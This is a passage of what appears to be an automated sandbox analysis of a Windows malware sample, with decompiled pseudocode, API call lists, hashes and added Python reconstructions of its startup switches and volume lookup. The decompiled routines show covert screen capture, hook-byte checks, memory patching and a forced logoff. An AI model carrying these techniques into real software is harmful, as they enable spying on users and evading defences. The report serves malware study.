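    return (mount point, volume GUID), or None where the sample returns 0."""
    path = path_add_backslash(folder)
    while True:
        name = get_volume_name(path)       # the sample passes a 100-WCHAR buffer
        if name is not None:
            break
        path = path_remove_backslash(path)
        path, removed = path_remove_file_spec(path)
        if not removed:
            return None                    # reached the root without finding a mount point
        path = path_add_backslash(path)
    # \\?\Volume{...}\ : the sample checks for '{' at WCHAR index 10 ...
    if len(name) <= 10 or name[10] != "{":
        return None
    # ... and stores a NUL at index 48, removing the trailing backslash, so that
    # CLSIDFromString sees exactly "{xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx}".
    braced = name[10:48]
    try:
        return path, uuid.UUID(braced)
    except ValueError:
        return None                        # CLSIDFromString returned an error
```

Run against the constructed resolver, a start folder of C:\Windows\System32\ climbs to C:\ and yields the volume GUID; a folder on a drive the resolver does not know walks up to its root and returns None, which is the path that ends in E004104B9 in the listing.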

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 65 4046db-4046ed call 403a5d 68 4046f3-404718 SetErrorMode GetCommandLineW CommandLineToArgvW 65->68 69 40478c-404794 ExitProcess 65->69 70 404767-40476d call 404392 68->70 71 40471a-40471f 68->71 76 404772-404776 70->76 73 404721-404726 71->73 74 404755-40475e LocalFree 71->74 77 404728-40472c 73->77 78 40474f-404753 73->78 74->70 75 404760-404765 call 4041cd 74->75 75->76 76->69 80 404778-40477f 76->80 77->78 81 40472e-404735 77->81 78->73 78->74 80->69 83 404781-40478b Sleep 80->83 84 404737-40473a 81->84 85 40474b 81->85 86 404747-404749 84->86 87 40473c-40473f 84->87 85->78 86->78 87->78 88 404741-404745 87->88 88->78
            C-Code - Quality: 100%
            			_entry_(signed int __ecx, void* __edx, void* __edi, void* __eflags, void* __fp0) {
            				int _v8;
            				char _v12;
            				char _v16;
            				void* _t17;
            				void* _t23;
            				signed int _t24;
            				signed int _t26;
            				signed int _t29;
            				void* _t44;
            
            				_t44 = __fp0;
            				_t27 = __ecx;
            				_t26 = 0; // executed
            				_t17 = E00403A5D(__ecx, __edx, __edi, 0); // executed
            				if(_t17 == 0) {
            					L18:
            					__eflags = _t26;
            					_t16 = _t26 == 0;
            					__eflags = _t16;
            					ExitProcess(0 | _t16);
            				}
            				_v16 = 0;
            				_v12 = 1;
            				SetErrorMode(0x8007);
            				_t23 = CommandLineToArgvW(GetCommandLineW(),  &_v8);
            				if(_t23 == 0) {
            					L14:
            					_t24 = E00404392(_t27, __eflags, _t44, _v16, _v12);
            					L15:
            					_t26 = _t24;
            					if(_t26 == 0 || ( *0x41a290 & 0x00000002) == 0) {
            						goto L18;
            					} else {
            						Sleep(0xffffffff);
            						return _t24;
            					}
            				}
            				_t29 = 0;
            				if(_v8 <= 0) {
            					L12:
            					LocalFree(_t23);
            					_t41 = _t26;
            					if(_t26 == 0) {
            						goto L14;
            					}
            					_t24 = E004041CD(_t41);
            					goto L15;
            				} else {
            					goto L3;
            				}
            				do {
            					L3:
            					_t27 =  *(_t23 + _t29 * 4);
            					if(_t27 != 0 &&  *_t27 == 0x2d) {
            						_t27 =  *(_t27 + 2) & 0x0000ffff;
            						if(_t27 == 0x66) {
            							_v16 = 1;
            						} else {
            							if(_t27 == 0x69) {
            								_t26 = 1;
            							} else {
            								if(_t27 == 0x6e) {
            									_v12 = 0;
            								}
            							}
            						}
            					}
            					_t29 = _t29 + 1;
            				} while (_t29 < _v8);
            				goto L12;
            			}

            Instruction addresses (per-line address column of the rendered C-code view, collapsed): 0x004046db .. 0x00404794

            APIs
            • SetErrorMode.KERNEL32(00008007,00000000), ref: 004046FF
            • GetCommandLineW.KERNEL32(?), ref: 00404709
            • CommandLineToArgvW.SHELL32(00000000), ref: 00404710
            • LocalFree.KERNEL32(00000000), ref: 00404756
            • Sleep.KERNEL32(000000FF,?,00000001), ref: 00404783
            • ExitProcess.KERNEL32 ref: 00404794
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: CommandLine$ArgvErrorExitFreeLocalModeProcessSleep
            • String ID:
            • API String ID: 3718487608-0
            • Opcode ID: 39de526fb5890e4bd1d9e36ddd10359875b30cbf285049968ab3f43851a3edee
            • Instruction ID: d3c2a9df50fa9b9d900ea428d53b8a70a81716f2d6086dc67f08c346c9634b0f
            • Opcode Fuzzy Hash: 39de526fb5890e4bd1d9e36ddd10359875b30cbf285049968ab3f43851a3edee
            • Instruction Fuzzy Hash: 0E113FB0944244AACF1567B48E487BE3B69AFC3344F2880BFE641BB2E1C73D4944871A
            Uniqueness

            Uniqueness Score: -1.00%
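_entry_ above first disables error dialogs with SetErrorMode(0x8007), which is SEM_FAILCRITICALERRORS | SEM_NOGPFAULTERRORBOX | SEM_NOALIGNMENTFAULTEXCEPT | SEM_NOOPENFILEERRORBOX, then scans every argv element, argv[0] included, and compares only the second WCHAR of arguments that begin with '-'. The Python below is an added reconstruction of that switch parsing and of the dispatch and exit logic at labels L12 to L18 of the listing, not code from the sample or from the report; it lets an analyst pick the switch that routes execution to E004041CD instead of E00404392 when re-running the sample. The field names install, force and flag_n are labels chosen here: the listing shows which switch sets which local, not what -f and -n mean inside the called routines.

```python
from dataclasses import dataclass
from typing import List

# Bit tested in the global at 0x41a290 before the Sleep(INFINITE) at the end of _entry_.
STAY_RESIDENT_FLAG = 0x2


@dataclass
class StartupOptions:
    install: bool = False   # _t26, set by -i: selects E004041CD instead of E00404392
    force: bool = False     # _v16, set by -f (label chosen here; meaning not in the listing)
    flag_n: bool = True     # _v12, cleared by -n (label chosen here; meaning not in the listing)


def parse_switches(argv: List[str]) -> StartupOptions:
    """Mirrors the argv loop in _entry_ (labels L3 to L12 of the listing)."""
    opts = StartupOptions()
    for arg in argv:                     # starts at index 0, so argv[0] is examined too
        if not arg or arg[0] != "-":
            continue                     # anything not beginning with '-' is ignored
        second = arg[1] if len(arg) > 1 else "\0"   # only the second WCHAR is compared
        if second == "f":
            opts.force = True
        elif second == "i":
            opts.install = True
        elif second == "n":
            opts.flag_n = False          # case-sensitive: "-N" matches nothing
    return opts


def dispatch_target(opts: StartupOptions, argv_parsed: bool) -> str:
    """Which routine _entry_ calls after the loop (labels L12 to L15).
    argv_parsed is False when CommandLineToArgvW returned NULL."""
    if argv_parsed and opts.install:
        return "E004041CD"
    return "E00404392(force, flag_n)"


def after_dispatch(result: int, global_flags: int) -> str:
    """Labels L15/L18: stay resident, or exit with 1 if the routine returned 0, else 0."""
    if result != 0 and (global_flags & STAY_RESIDENT_FLAG):
        return "Sleep(INFINITE)"
    return "ExitProcess(%d)" % (1 if result == 0 else 0)
```

Two consequences worth knowing before detonating the sample again: "-fast" counts as -f because only the second character is inspected, and a non-zero return from the dispatched routine keeps the process alive only when bit 1 of the global at 0x41a290 is set; otherwise the process exits with code 0 on success and 1 on failure.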

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 112 40fe5c-40fef5 LoadLibraryA GetProcAddress * 7 113 40fefb-40fefe 112->113 114 4102dd-4102e6 112->114 113->114 117 40ff04-40ff07 113->117 115 4102e8-4102eb FreeLibrary 114->115 116 4102ed-4102f0 114->116 118 4102f2-4102f5 FreeLibrary 116->118 119 4102f7-4102fa 116->119 117->114 120 40ff0d-40ff10 117->120 118->119 121 410301-410308 119->121 122 4102fc-4102ff FreeLibrary 119->122 120->114 123 40ff16-40ff19 120->123 122->121 123->114 124 40ff1f-40ff22 123->124 124->114 125 40ff28-40ff2a 124->125 125->114 126 40ff30-40ff47 LoadLibraryA GetProcAddress 125->126 126->114 127 40ff4d-40ffbe LoadLibraryA GetProcAddress * 8 126->127 127->114 128 40ffc4-40ffc7 127->128 128->114 129 40ffcd-40ffd0 128->129 129->114 130 40ffd6-40ffd9 129->130 130->114 131 40ffdf-40ffe2 130->131 131->114 132 40ffe8-40ffeb 131->132 132->114 133 40fff1-40fff4 132->133 133->114 134 40fffa-40fffc 133->134 134->114 135 410002-410020 134->135 135->114 137 410026-410037 135->137 139 4102d7 137->139 140 41003d-410046 137->140 139->114 142 4102d1 140->142 143 41004c-410066 LoadImageW 140->143 142->139 144 410090-410092 143->144 145 410068-410078 GetIconInfo 143->145 148 410097-41009a 144->148 146 410088 145->146 147 41007a-410086 GetCursorPos 145->147 149 41008b-41008e 146->149 147->146 147->149 150 4100a4-4100b4 148->150 151 41009c-4100a2 148->151 149->144 152 410094 149->152 153 4100b7-4100c6 150->153 151->153 152->148 157 4102cb 153->157 158 4100cc-4100d8 153->158 157->142 160 4102c5 158->160 161 4100de-4100e5 158->161 160->157 162 4100e7-4100f1 161->162 163 41010e-410126 161->163 164 4100f3 162->164 165 4100f5-4100fa 162->165 169 4102bc-4102bf 163->169 170 41012c-41012f 163->170 164->165 167 4100fc 165->167 168 4100fe-410101 165->168 167->168 171 410103 168->171 172 410106-410109 168->172 169->160 174 410131-41013a 170->174 175 410159-410169 170->175 171->172 172->163 173 41010b 172->173 173->163 176 41013c 174->176 177 41013e-410147 174->177 175->169 181 41016f-410172 175->181 176->177 178 410149 177->178 179 41014b-410153 DrawIcon 177->179 178->179 179->175 181->169 182 410178-41018b 181->182 184 410191-410196 182->184 185 4102b6 182->185 184->185 186 41019c-41019f 184->186 185->169 186->185 187 4101a5-4101b1 call 4103ed 186->187 187->185 190 4101b7-4101c3 187->190 192 410201-41020c call 410418 190->192 193 4101c5-4101ca 190->193 192->185 198 410212-410220 192->198 193->192 195 4101cc 193->195 197 4101cf-4101dc lstrcmpiW 195->197 199 4101e9-4101fe call 410454 197->199 200 4101de-4101e5 197->200 198->185 205 410226-410229 198->205 199->192 200->197 201 4101e7 200->201 201->192 205->185 206 41022f-410238 205->206 207 410281-41029d 206->207 208 41023a-41027b call 410454 206->208 212 4102aa-4102b2 207->212 213 41029f-4102a8 207->213 208->207 212->185 213->185
            C-Code - Quality: 39%
            			E0040FE5C(WCHAR* _a4, char _a8, signed short _a12) {
            				struct HINSTANCE__* _v12;
            				struct HINSTANCE__* _v16;
            				struct HINSTANCE__* _v20;
            				_Unknown_base(*)()* _v24;
            				void* _v28;
            				void* _v32;
            				struct HDC__* _v36;
            				_Unknown_base(*)()* _v40;
            				_Unknown_base(*)()* _v44;
            				struct tagPOINT _v52;
            				_Unknown_base(*)()* _v56;
            				struct HINSTANCE__* _v60;
            				_Unknown_base(*)()* _v64;
            				_Unknown_base(*)()* _v68;
            				_Unknown_base(*)()* _v72;
            				_Unknown_base(*)()* _v76;
            				_Unknown_base(*)()* _v80;
            				_Unknown_base(*)()* _v84;
            				_Unknown_base(*)()* _v88;
            				struct HINSTANCE__* _v92;
            				struct HINSTANCE__* _v96;
            				struct HINSTANCE__* _v100;
            				char _v104;
            				_Unknown_base(*)()* _v108;
            				intOrPtr _v112;
            				char _v116;
            				_Unknown_base(*)()* _v120;
            				char _v148;
            				signed int _v152;
            				struct _ICONINFO _v172;
            				char _v188;
            				struct HINSTANCE__* _t169;
            				_Unknown_base(*)()* _t176;
            				struct HINSTANCE__* _t181;
            				_Unknown_base(*)()* _t182;
            				struct HINSTANCE__* _t183;
            				_Unknown_base(*)()* _t191;
            				struct HDC__* _t197;
            				struct HICON__* _t199;
            				signed int _t200;
            				intOrPtr _t202;
            				intOrPtr _t204;
            				void* _t206;
            				void* _t223;
            				intOrPtr* _t224;
            				int _t239;
            				void* _t246;
            				int _t251;
            				unsigned int _t256;
            				intOrPtr* _t258;
            				signed short _t259;
            				intOrPtr _t260;
            				WCHAR** _t261;
            				intOrPtr _t264;
            				signed int _t265;
            				signed int _t268;
            				void* _t271;
            
            				_v32 = 0;
            				_v60 = 0;
            				_v16 = 0;
            				_v104 = 1;
            				_v100 = 0;
            				_v96 = 0;
            				_v92 = 0;
            				_t169 = LoadLibraryA("gdiplus.dll");
            				_v20 = _t169;
            				_v24 = GetProcAddress(_t169, "GdiplusStartup");
            				_v80 = GetProcAddress(_v20, "GdiplusShutdown");
            				_v88 = GetProcAddress(_v20, "GdipCreateBitmapFromHBITMAP");
            				_v72 = GetProcAddress(_v20, "GdipDisposeImage");
            				_v40 = GetProcAddress(_v20, "GdipGetImageEncodersSize");
            				_v64 = GetProcAddress(_v20, "GdipGetImageEncoders");
            				_t176 = GetProcAddress(_v20, "GdipSaveImageToStream");
            				_v108 = _t176;
            				if(_v24 == 0 || _v80 == 0 || _v88 == 0 || _v72 == 0 || _v40 == 0 || _v64 == 0 || _t176 == 0) {
            					L74:
            					if(_v20 != 0) {
            						FreeLibrary(_v20);
            					}
            					if(_v60 != 0) {
            						FreeLibrary(_v60);
            					}
            					if(_v16 != 0) {
            						FreeLibrary(_v16);
            					}
            					return _v32;
            				} else {
            					_t181 = LoadLibraryA("ole32.dll");
            					_v60 = _t181;
            					_t182 = GetProcAddress(_t181, "CreateStreamOnHGlobal");
            					_v120 = _t182;
            					if(_t182 == 0) {
            						goto L74;
            					}
            					_t183 = LoadLibraryA("gdi32.dll");
            					_v16 = _t183;
            					_t258 = GetProcAddress(_t183, "CreateDCW");
            					_v12 = GetProcAddress(_v16, "CreateCompatibleDC");
            					_v44 = GetProcAddress(_v16, "CreateCompatibleBitmap");
            					_v28 = GetProcAddress(_v16, "GetDeviceCaps");
            					_v56 = GetProcAddress(_v16, "SelectObject");
            					_v76 = GetProcAddress(_v16, "BitBlt");
            					_v84 = GetProcAddress(_v16, "DeleteObject");
            					_t191 = GetProcAddress(_v16, "DeleteDC");
            					_v68 = _t191;
            					if(_t258 == 0 || _v12 == 0 || _v44 == 0 || _v28 == 0 || _v56 == 0 || _v76 == 0 || _v84 == 0 || _t191 == 0) {
            						goto L74;
            					} else {
            						_push(0);
            						_push( &_v104);
            						_push( &_v116);
            						_v104 = 1;
            						_v100 = 0;
            						_v96 = 0;
            						_v92 = 0;
            						if(_v24() != 0) {
            							goto L74;
            						}
            						_t264 =  *_t258(L"DISPLAY", 0, 0, 0);
            						_v24 = _t264;
            						if(_t264 == 0) {
            							L73:
            							_v80(_v116);
            							goto L74;
            						}
            						_t197 = _v12(_t264);
            						_v36 = _t197;
            						if(_t197 == 0) {
            							L72:
            							_v68(_v24);
            							goto L73;
            						}
            						_t199 = LoadImageW(0, 0x7f00, 2, 0, 0, 0x8040);
            						_v12 = _t199;
            						if(_t199 == 0) {
            							L24:
            							_t259 = 0;
            							goto L26;
            						} else {
            							if(GetIconInfo(_t199,  &_v172) == 0 || GetCursorPos( &_v52) == 0) {
            								_v12 = 0;
            							}
            							if(_v12 != 0) {
            								_t259 = _a12;
            								L26:
            								if(_t259 == 0) {
            									_t200 = _v28(_t264, 8);
            									_t265 = _t200;
            									_a12 = _v28(_v24, 0xa);
            								} else {
            									_t265 = _t259 & 0x0000ffff;
            									_a12 = _t265;
            								}
            								_t202 = _v44(_v24, _t265, _a12);
            								_v44 = _t202;
            								if(_t202 == 0) {
            									L71:
            									_v68(_v36);
            									goto L72;
            								} else {
            									_t204 = _v56(_v36, _t202);
            									_v112 = _t204;
            									if(_t204 == 0) {
            										L70:
            										_v84(_v44);
            										goto L71;
            									}
            									_t206 = 0;
            									_t246 = 0;
            									if(_t259 != 0) {
            										_t256 = (_t259 & 0x0000ffff) >> 1;
            										_t206 = _v52.x - _t256;
            										if(_t206 < 0) {
            											_t206 = 0;
            										}
            										_t246 = _v52.y - _t256;
            										if(_t246 < 0) {
            											_t246 = 0;
            										}
            										_t81 =  &_v52;
            										 *_t81 = _v52.x - _t206;
            										if( *_t81 < 0) {
            											_v52.x = 0;
            										}
            										_t84 =  &(_v52.y);
            										 *_t84 = _v52.y - _t246;
            										if( *_t84 < 0) {
            											_v52.y = 0;
            										}
            									}
            									_push(0x40cc0020);
            									_push(_t246);
            									_push(_t206);
            									_push(_v24);
            									_push(_a12);
            									_push(_t265);
            									_push(0);
            									_push(0);
            									_push(_v36);
            									if(_v76() == 0) {
            										L69:
            										_v56(_v36, _v112);
            										goto L70;
            									} else {
            										if(_v12 != 0) {
            											_t251 = _v52.x - _v172.xHotspot;
            											if(_t251 < 0) {
            												_t251 = 0;
            											}
            											_t239 = _v52.y - _v172.yHotspot;
            											if(_t239 < 0) {
            												_t239 = 0;
            											}
            											DrawIcon(_v36, _t251, _t239, _v12);
            										}
            										_push( &_v12);
            										_push(0);
            										_push(_v44);
            										_v12 = 0;
            										if(_v88() != 0 || _v12 == 0) {
            											goto L69;
            										} else {
            											_push( &_v28);
            											_push( &_a12);
            											_a12 = 0;
            											_v28 = 0;
            											if(_v40() != 0) {
            												L68:
            												_v72(_v12);
            												goto L69;
            											}
            											_t215 = _v28;
            											if(_v28 == 0 || _a12 == 0) {
            												goto L68;
            											} else {
            												_t260 = E004103ED(_t215);
            												_v40 = _t260;
            												if(_t260 == 0) {
            													goto L68;
            												}
            												_push(_t260);
            												_push(_v28);
            												_push(_a12);
            												if(_v64() != 0) {
            													L60:
            													E00410418(_v40);
            													if(_a12 == 0) {
            														_push( &_v32);
            														_push(1);
            														_push(0);
            														if(_v120() == 0 && _v32 != 0) {
            															_v152 = 0;
            															if(_a8 > 0) {
            																E00410454( &_v148, 0x402f6c, 0x10);
            																 *((intOrPtr*)(_t271 + _v152 * 0x1c - 0x7c)) = 4;
            																 *((intOrPtr*)(_t271 + _v152 * 0x1c - 0x80)) = 1;
            																 *((intOrPtr*)(_t271 + _v152 * 0x1c - 0x78)) =  &_a8;
            																_v152 = _v152 + 1;
            															}
            															_t223 = _v108(_v12, _v32,  &_v188,  &_v152);
            															_t224 = _v32;
            															if(_t223 == 0) {
            																 *((intOrPtr*)( *_t224 + 0x14))(_t224, 0, 0, 0, 0);
            															} else {
            																 *((intOrPtr*)( *_t224 + 8))(_t224);
            																_v32 = 0;
            															}
            														}
            													}
            													goto L68;
            												}
            												_t268 = 0;
            												if(_a12 <= 0) {
            													goto L60;
            												}
            												_t261 = _t260 + 0x30;
            												while(lstrcmpiW(_a4,  *_t261) != 0) {
            													_t268 = _t268 + 1;
            													_t261 =  &(_t261[0x13]);
            													if(_t268 < _a12) {
            														continue;
            													}
            													goto L60;
            												}
            												E00410454( &_v188, _t268 * 0x4c + _v40, 0x10);
            												_a12 = 0;
            												goto L60;
            											}
            										}
            									}
            								}
            							}
            							goto L24;
            						}
            					}
            				}
            			}

            Instruction addresses (per-line address column of the rendered C-code view, collapsed): 0x0040fe75 .. 0x00410308

            APIs
            • LoadLibraryA.KERNEL32(gdiplus.dll,?,?,?), ref: 0040FE8E
            • GetProcAddress.KERNEL32(00000000,GdiplusStartup), ref: 0040FE9F
            • GetProcAddress.KERNEL32(000001F4,GdiplusShutdown), ref: 0040FEAC
            • GetProcAddress.KERNEL32(000001F4,GdipCreateBitmapFromHBITMAP), ref: 0040FEB9
            • GetProcAddress.KERNEL32(000001F4,GdipDisposeImage), ref: 0040FEC6
            • GetProcAddress.KERNEL32(000001F4,GdipGetImageEncodersSize), ref: 0040FED3
            • GetProcAddress.KERNEL32(000001F4,GdipGetImageEncoders), ref: 0040FEE0
            • GetProcAddress.KERNEL32(000001F4,GdipSaveImageToStream), ref: 0040FEED
            • LoadLibraryA.KERNEL32(ole32.dll,?,?,?), ref: 0040FF35
            • GetProcAddress.KERNEL32(00000000,CreateStreamOnHGlobal), ref: 0040FF40
            • LoadLibraryA.KERNEL32(gdi32.dll,?,?,?), ref: 0040FF52
            • GetProcAddress.KERNEL32(00000000,CreateDCW), ref: 0040FF5D
            • GetProcAddress.KERNEL32(?,CreateCompatibleDC), ref: 0040FF69
            • GetProcAddress.KERNEL32(?,CreateCompatibleBitmap), ref: 0040FF76
            • GetProcAddress.KERNEL32(?,GetDeviceCaps), ref: 0040FF83
            • GetProcAddress.KERNEL32(?,SelectObject), ref: 0040FF90
            • GetProcAddress.KERNEL32(?,BitBlt), ref: 0040FF9D
            • GetProcAddress.KERNEL32(?,DeleteObject), ref: 0040FFAA
            • GetProcAddress.KERNEL32(?,DeleteDC), ref: 0040FFB7
            • LoadImageW.USER32 ref: 0041005B
            • GetIconInfo.USER32(00000000,?), ref: 00410070
            • GetCursorPos.USER32(?), ref: 0041007E
            • DrawIcon.USER32 ref: 00410153
            • lstrcmpiW.KERNEL32(?,-00000030,?,?,?), ref: 004101D4
            • FreeLibrary.KERNEL32(000001F4,?,?,?), ref: 004102EB
            • FreeLibrary.KERNEL32(?,?,?,?), ref: 004102F5
            • FreeLibrary.KERNEL32(?,?,?,?), ref: 004102FF
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: AddressProc$Library$Load$Free$Icon$CursorDrawImageInfolstrcmpi
            • String ID: BitBlt$CreateCompatibleBitmap$CreateCompatibleDC$CreateDCW$CreateStreamOnHGlobal$DISPLAY$DeleteDC$DeleteObject$GdipCreateBitmapFromHBITMAP$GdipDisposeImage$GdipGetImageEncoders$GdipGetImageEncodersSize$GdipSaveImageToStream$GdiplusShutdown$GdiplusStartup$GetDeviceCaps$SelectObject$gdi32.dll$gdiplus.dll$ole32.dll
            • API String ID: 1554524784-1167942225
            • Opcode ID: 7d0c615cc9c77ff9687a49a3b7338600e7575468cc622ecd9a8ad73826cc4663
            • Instruction ID: f429e62eea094673f0089e819726addd4f2a5fe35902f2d08e2196396ccc61b1
            • Opcode Fuzzy Hash: 7d0c615cc9c77ff9687a49a3b7338600e7575468cc622ecd9a8ad73826cc4663
            • Instruction Fuzzy Hash: 6BE1D371D00259ABDF209FE5CD88AEEBFB9BF08301F14446BE515B2290D6B99D80DF58
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            C-Code - Quality: 89%
            			E00404392(void* __ecx, void* __eflags, void* __fp0, intOrPtr _a4, char _a8) {
            				char _v536;
            				char _v540;
            				char _v544;
            				char _v644;
            				signed char _v648;
            				char _v748;
            				short _v760;
            				short _v772;
            				char _v776;
            				intOrPtr _v780;
            				void _v784;
            				void _v785;
            				void* _v788;
            				char _v789;
            				void* _v792;
            				void _v793;
            				void* _v796;
            				char _v797;
            				void* _v800;
            				char _v801;
            				void* _v804;
            				char _v813;
            				void* _v817;
            				void* __ebx;
            				void* __edi;
            				void* __esi;
            				void* __ebp;
            				void* _t73;
            				void* _t78;
            				intOrPtr* _t79;
            				int _t81;
            				void* _t83;
            				void* _t87;
            				void* _t91;
            				int _t99;
            				int _t108;
            				void _t129;
            				void* _t146;
            				void* _t165;
            
            				_t165 = __fp0;
            				_t135 = __ecx;
            				_t148 =  &_v776;
            				_v785 = 0;
            				if(E00415750(0, __ecx,  &_v776,  *0x41a2ec) != 0) {
            					_v784 = _v772;
            					_t129 = E0040401E( &_v784, __ecx, _v776);
            					_v784 = _t129;
            					if(_t129 == 0) {
            						_v784 = 0;
            					}
            					E004157F8( &_v776);
            				}
            				if(_v784 != 0x1e6) {
            					__eflags = _v784 - 0xc;
            					if(__eflags != 0) {
            						goto L42;
            					}
            					_t73 = E00403D00(_t135, __eflags, 0x8789347b, 2);
            					_v792 = _t73;
            					__eflags = _t73;
            					if(_t73 == 0) {
            						L40:
            						__eflags = _a8 - 1;
            						if(_a8 == 1) {
            							E00414A9D(0, _t148,  *0x41a2ec);
            						}
            						goto L42;
            					}
            					E00403CC5(0x19367400,  &_v748, 1);
            					_t78 = OpenMutexW(0x100000, 0,  &_v760);
            					_t148 = GetFileAttributesExW;
            					__eflags = _t78;
            					if(_t78 == 0) {
            						L24:
            						_t79 =  *0x41a294; // 0x0
            						__imp__IsWellKnownSid( *_t79, 0x16);
            						__eflags = _t79 - 1;
            						if(__eflags != 0) {
            							_v793 = 0;
            							_t81 = ReadProcessMemory(0xffffffff, _t148,  &_v793, 1, 0);
            							__eflags = _t81;
            							if(_t81 == 0) {
            								L30:
            								_push( *((intOrPtr*)(_v788 + 4)));
            								_t83 = E004168E8(_t135, E004051B8,  *((intOrPtr*)(_v788 + 8)));
            								_t148 = 0x41a2f0;
            								_v801 = E004051B8(_t83, 0, 0x41a2f0,  &_v540, E004051B8, 0x41a2f0);
            								L31:
            								__eflags = _v797 - 1;
            								if(_v797 == 1) {
            									_t87 = E00411CDD( &_v536, 0, _t148, 0,  &_v776);
            									__eflags = _t87;
            									_v817 = _t87 != 0;
            									__eflags = _v817;
            									if(_v817 != 0) {
            										E00403CC5(0x2a43533f,  &_v760, 1);
            										_t91 = CreateEventW(0x41a2c8, 1, 0,  &_v772);
            										_t148 = _v788;
            										_v800 = _t91;
            										_v796 = _t148;
            										_push(0xffffffff);
            										__eflags = _t91;
            										if(_t91 != 0) {
            											WaitForMultipleObjects(2,  &_v788, 0, ??);
            										} else {
            											WaitForSingleObject(_t148, ??);
            										}
            										__eflags = _v788;
            										if(_v788 != 0) {
            											CloseHandle(_v788);
            										}
            										CloseHandle(_v772);
            										CloseHandle(_t148);
            									}
            								}
            								L39:
            								E00413A4E(_v796);
            								goto L40;
            							}
            							__eflags = _v793 - 0xe9;
            							if(_v793 != 0xe9) {
            								goto L30;
            							}
            							_t99 = GetFileAttributesExW(0x41a702, 0x78f16360,  &_v784);
            							__eflags = _t99 - 1;
            							if(_t99 != 1) {
            								goto L30;
            							}
            							_push( *((intOrPtr*)(_v792 + 4)));
            							E004168E8(_t135, E00405520,  *_v792);
            							_push(_a4);
            							_t148 = 0x41a2f0;
            							_push( &_v544);
            							_v813 = E00405520( &_v544, 0, _v796, 0x41a2f0, E00405520, 0x41a2f0, _t165);
            							VirtualFree(_v804, 0, 0x8000);
            							goto L31;
            						}
            						_v793 = E00405838(__eflags);
            						goto L39;
            					}
            					CloseHandle(_t78);
            					while(1) {
            						_v785 = 0;
            						_t108 = ReadProcessMemory(0xffffffff, _t148,  &_v785, 1, 0);
            						__eflags = _t108;
            						if(_t108 == 0) {
            							goto L23;
            						}
            						__eflags = _v785 - 0xe9;
            						if(_v785 == 0xe9) {
            							goto L24;
            						}
            						L23:
            						Sleep(0x1f4);
            					}
            				} else {
            					if(E00405469(_t135, _v780) != 0) {
            						E00403CC5(0x38901130,  &_v748, 1);
            						if(CreateMutexW(0x41a2c8, 1,  &_v760) == 0) {
            							_v784 = 0;
            						} else {
            							_v784 = E00413A5E(_t113);
            						}
            						if(_v784 != 0) {
            							E004060A9(_t135,  &_v644);
            							if((_v648 & 0x00000020) != 0) {
            								 *0x41a290 =  *0x41a290 | 0x00000008;
            							}
            							E00404D06();
            							if(( *0x41a290 & 0x00000008) != 0) {
            								ExitWindowsEx(0x14, 0x80000000);
            							}
            							E00403CC5(0x2a43533f,  &_v748, 1);
            							_t146 = OpenEventW(2, 0,  &_v760);
            							if(_t146 != 0) {
            								SetEvent(_t146);
            								CloseHandle(_t146);
            							}
            							E004040DB(1);
            							_v789 = 1;
            							CloseHandle(_v788);
            						}
            					}
            					L42:
            					E00410418(_v780);
            					return _v789;
            				}
            			}

            APIs
              • Part of subcall function 00415750: CreateFileW.KERNEL32(?,80000000,?,00000000,00000003,00000000,00000000,?,?,?,?,004043B8,?,?,00000000), ref: 00415775
              • Part of subcall function 00415750: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,004043B8,?,?,00000000), ref: 00415788
            • CreateMutexW.KERNEL32(0041A2C8,00000001,?,38901130,?,00000001,?), ref: 00404422
            • ExitWindowsEx.USER32(00000014,80000000), ref: 00404478
            • OpenEventW.KERNEL32(00000002,00000000,?,2A43533F,?,00000001), ref: 00404497
            • SetEvent.KERNEL32(00000000), ref: 004044AA
            • CloseHandle.KERNEL32(00000000), ref: 004044B1
            • CloseHandle.KERNEL32(000001E6,00000001), ref: 004044C3
            • OpenMutexW.KERNEL32(00100000,00000000,?,19367400,?,00000001,8789347B,00000002), ref: 00404509
            • CloseHandle.KERNEL32(00000000), ref: 00404520
            • ReadProcessMemory.KERNEL32(000000FF,7620F9B0,00000000,00000001,00000000), ref: 00404535
            • Sleep.KERNEL32(000001F4), ref: 00404547
            • IsWellKnownSid.ADVAPI32(00000000,00000016), ref: 00404558
            • ReadProcessMemory.KERNEL32(000000FF,7620F9B0,00000000,00000001,00000000), ref: 00404580
            • VirtualFree.KERNEL32(?,00000000,00008000,?,00000001,?,?), ref: 004045DF
            • GetFileAttributesExW.KERNEL32(0041A702,78F16360,?), ref: 0040459C
              • Part of subcall function 004168E8: VirtualProtect.KERNEL32(004051B8,?,00000040,00000000,7620F9B0,?,?,004045FB,00000001,?), ref: 004168FD
              • Part of subcall function 004168E8: VirtualProtect.KERNEL32(004051B8,?,00000000,00000000,?,?,004045FB,00000001,?), ref: 00416930
            • CreateEventW.KERNEL32(0041A2C8,00000001,00000000,?,2A43533F,?,00000001,00000001,?,00000000,0041A2F0,00000000,?,00000001,?), ref: 0040465D
            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00404676
            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00404686
            • CloseHandle.KERNEL32(?), ref: 00404696
            • CloseHandle.KERNEL32(?), ref: 004046A6
            • CloseHandle.KERNEL32(?), ref: 004046A9
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
